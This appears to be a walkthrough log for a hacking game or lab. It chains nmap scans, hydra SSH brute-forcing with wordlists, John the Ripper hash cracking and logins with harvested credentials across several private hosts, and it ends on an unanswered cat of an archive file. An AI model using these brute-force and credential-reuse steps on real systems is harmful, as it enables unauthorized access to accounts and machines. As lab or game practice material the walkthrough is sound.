whoami@haiku:~$ ping lendwey.co
whoami@haiku:~$ nmap -sV -O -Pn 10.199.209.167

hydra -l [username] -P [password list path] [protocol]://[target IP]

whoami@haiku:~$ hydra -l hal3000 -P /Documents/rockyou.txt ssh://10.199.209.167
Username: hal3000
Password: rre4ighe4545345857df

whoami@haiku:~$ ssh hal3000@10.199.209.167
password: rre4ighe4545345857df

hal3000@h3-web:~$ cat "whassup.xml"
MaxwellGotSmartr - 

BaseBaller : b52b3a5da597df40d7b174be98ad581d17ceb07859121d4ab54ca171f18c7e39


hal3000@h3-web:~$ ifconfig
inet 10.0.0.0 netmask 255.0.0.0 broadcast 10.255.255.255

hal3000@h3-web:~$ nmap 10.0.0.0/8

hoami@haiku:~$ ping 10.35.159.131
whoami@haiku:~$ nmap -sV -O -Pn 10.35.159.131


BaseBaller: b52b3a5da597df40d7b174be98ad581d17ceb07859121d4ab54ca171f18c7e39

whoami@haiku:~$ echo b52b3a5da597df40d7b174be98ad581d17ceb07859121d4ab54ca171f18c7e39 > BaseBaller.txt 
whoami@haiku:~$ john --wordlist=/Documents/passwordMed.txt BaseBaller.txt
Found Password(s): Ac1dBlu3J3anS

whoami@haiku:~$ssh BaseBaller@10.35.159.131
password: Ac1dBlu3J3anS

GTF Lab Token
Username: LabGuest2049GTF
Password: KEO45K$$32jduw


whoami@haiku:~$ ping 10.223.15.191

whoami@haiku:~$ nmap -sV -O -Pn 10.223.15.191
Nmap scan report for 10.223.15.191
22/tcp		open	Ssh
Device name: francoiskkong

whoami@haiku:~$ hydra -l francoiskkong -P /Documents/passwordMed.txt ssh://10.223.15.191
Username: francoiskkong
Password: AnnDarrow1933

whoami@haiku:~$ ssh francoiskkong@10.223.15.191
password: AnnDarrow1933


whoami@haiku:~$ ping 10.235.184.190

whoami@haiku:~$ nmap -sV -O -Pn 10.235.184.190
22/tcp		open	Ssh
Device name: Vaati

whoami@haiku:~$ hydra -l Vaati -P /Documents/passwordMed.txt ssh://10.235.184.190
Username: Vaati
Password: cacioep3p3

whoami@haiku:~$ ssh Vaati@10.235.184.190
password: cacioep3p3whoami

Vaati@Vaati:~/Trash$ cat "mandatory cred update.xml"
UN: ECFguestCSTEMP036
PW: djjdAI454Mg8Jfiskfgeuq7k

Nmap scan report for 10.117.188.13
22/tcp		open	Ssh
Device name: ECF

whoami@haiku:~$ssh ECFguestCSTEMP036@10.117.188.13
password: djjdAI454Mg8Jfiskfgeuq7k

ECFguestCSTEMP036@ECF:~$ls Documents/
atr6475kfuWH1T3pst256sds323tys52.tar6h      
     
ECFguestCSTEMP036@ECF:~$zion /Documents/atr6475kfuWH1T3pst256sds323tys52.tar6h
ECFguestCSTEMP036@ECF:~$cat /Documents/atr6475kfuWH1T3pst256sds323tys52.tar6h
